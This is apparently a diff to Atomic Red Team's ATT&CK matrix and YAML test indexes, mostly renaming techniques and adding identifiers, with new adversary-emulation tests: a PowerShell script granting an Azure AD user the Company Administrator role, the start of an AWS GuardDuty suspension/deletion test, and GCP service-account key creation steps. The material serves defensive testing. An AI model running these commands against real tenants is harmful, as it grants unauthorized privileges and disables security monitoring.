 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -28,7 +28,7 @@
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
 |  | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Query Registry](../../T1012/T1012.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
@@ -108,7 +108,7 @@
 |  |  | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) |  | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) |  | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -2537,7 +2537,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2564,6 +2564,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -18439,7 +18440,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18479,6 +18480,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -32669,7 +32671,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32772,7 +32774,53 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1098.003
+    atomic_tests:
+    - name: Azure AD - Add Company Administrator Role to a user
+      auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
+      description: 'Add an existing Azure user account the Company Administrator Role.
+
+        '
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: string
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: string
+          default: p4sswd
+        target_user:
+          description: Name of the user who will be assigned the Company Admin role
+          type: string
+          default: default
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'MSOnline module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name MSOnline -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name MSOnline -Force
+
+          '
+      executor:
+        command: |
+          Import-Module MSOnline
+          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+          Connect-MsolService -Credential $Credential
+          Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
+        cleanup_command: 'Remove-MsolRoleMember -RoleName "Company Administrator"
+          -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+
+          '
+        name: powershell
+        elevation_required: false
  T1547.012:
    technique:
      x_mitre_platforms:
@@ -32800,7 +32848,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32840,6 +32888,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -42256,7 +42305,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -42277,6 +42326,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -49980,6 +50030,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -18387,7 +18388,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18427,6 +18428,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -33031,7 +33033,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -33134,6 +33136,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -33162,7 +33165,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -33202,6 +33205,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -42153,7 +42157,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -42174,6 +42178,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -49877,6 +49882,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -15284,7 +15285,6 @@ defense-evasion:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -15304,6 +15304,13 @@ defense-evasion:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1480.001:
    technique:
@@ -18299,7 +18306,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18339,6 +18346,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -25791,7 +25799,6 @@ privilege-escalation:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -25811,6 +25818,13 @@ privilege-escalation:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1053.002:
    technique:
@@ -32581,7 +32595,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32684,6 +32698,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32712,7 +32727,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32752,6 +32767,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41703,7 +41719,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41724,6 +41740,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -42137,7 +42154,6 @@ persistence:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -42157,6 +42173,13 @@ persistence:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1053.002:
    technique:
@@ -49479,6 +49502,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -67122,7 +67146,6 @@ initial-access:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -67142,6 +67165,13 @@ initial-access:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1566.003:
    technique:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -18247,7 +18248,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18287,6 +18288,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -32477,7 +32479,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32580,6 +32582,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32608,7 +32611,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32648,6 +32651,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41599,7 +41603,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41620,6 +41624,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -49323,6 +49328,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -10390,7 +10391,42 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1562.001
-    atomic_tests: []
+    atomic_tests:
+    - name: AWS - GuardDuty Suspension or Deletion
+      auto_generated_guid: 11e65d8d-e7e4-470e-a3ff-82bc56ad938e
+      description: 'Enables GuardDuty in AWS, upon successful creation this test will
+        suspend and then delete the GuardDuty configuration.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        region:
